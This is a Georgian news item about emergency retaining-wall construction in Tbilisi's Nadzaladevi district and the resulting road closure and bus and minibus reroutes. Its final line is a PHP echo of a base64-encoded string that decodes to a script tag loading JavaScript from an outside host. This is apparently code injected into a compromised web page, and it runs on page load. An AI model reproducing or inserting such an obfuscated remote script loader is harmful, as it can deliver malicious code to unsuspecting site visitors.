celsiusi
ავერსი საქკაბელი

ნაძალადევის რაიონში საყრდენი კედლის მოწყობის გადაუდებელი სამუშაოები მიმდინარეობს, რის გამოც, 22 ივნისიდან ორი კვირის განმავლობაში, გია რომელაშვილისა და გიორგი ბოთერაშვილის ქუჩების კვეთის მიმდებარედ ავტომობილების გადაადგილება შეიზღუდა. ავტომობილები იმოძრავებენ აბაის, ანაპის 414-ე დივიზიისა და ავეტიკ ისააკიანის ქუჩების გამოყენებით.

რაც შეეხება საზოგადოებრივ ტრანსპორტს, N317 და N386 ავტობუსები მუხიანის დასახლებიდან მოძრაობისას არ გაივლიან რომელაშვილის ქუჩას. კერძოდ, საზოგადოებრივი ტრანსპორტი ისააკიანის ქუჩიდან ანაპის 414-ე დივიზიის ქუჩის მიმართულებით, გაჩერებების გარეშე იმოძრავებს, შემდეგ აბაის ქუჩით დაუკავშირდება რომელაშვილის ქუჩის მონაკვეთს და ანზორ გელდიშვილის ქუჩაზე მობრუნდება. აღნიშნული ტერიტორიიდან N317 ავტობუსი დაუკავშირდება ჩარგლის ქუჩას, ხოლო N386 ანაპის 414-ე დივიზიის ქუჩას, საიდანაც ავტობუსები მოძრაობას გააგრძელებენ დადგენილი სქემით.

უკუმიმართულებისას, N317 ჩარგლის ქუჩიდან, ხოლო N386 ანაპის 414-ე დივიზიის ქუჩიდან მოძრაობას აბაის ქუჩაზე გააგრძელებს, შემდეგ რომელაშვილისა და ბოთერაშვილის ქუჩებით კვლავ აბაის ქუჩას დაუკავშირდება, გელდიშვილის ქუჩაზე მობრუნდება და მარცხნივ მოხვევით, ანაპის 414-ე დივიზიის ქუჩისკენ გადაადგილდება. აღნიშნული ტერიტორიიდან ავტობუსები ისააკიანის და ავშნის ქუჩების გადაკვეთამდე შეუჩერებლად იმოძრავებენ, შემდეგ კი სვლას გააგრძელებენ უკვე არსებული მარშრუტით.

ავტობუსი N375 მეტროსადგურ „სარაჯიშვილის“ მიმართულებით მოძრაობისას, რომელაშვილის ქუჩაზე გადაადგილდება ზღვის უბნის III მიკრორაიონის I კვარტლის N19 კორპუსამდე, რის შემდეგაც, დაუკავშირდება ისააკიანის ქუჩას და ანაპის 414-ე დივიზიის ქუჩით, მეტროსადგურ „სარაჯიშვილისკენ“ იმოძრავებს. N375 უკუმიმართულებისას მგზავრებს იმავე მარშრუტით მოემსახურება.

N421 და N510 მიკროავტობუსები რომელაშვილის ქუჩაზე გადაკეტილ საგზაო მონაკვეთს ზღვის უბნის IV მიკრორაიონის N11 და N7 კორპუსების საშუალებით შემოუვლიან, რის შემდეგაც, კვლავ რომელაშვილის ქუჩას დაუკავშირდებიან და დადგენილი სქემით იმოძრავებენ.

423
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");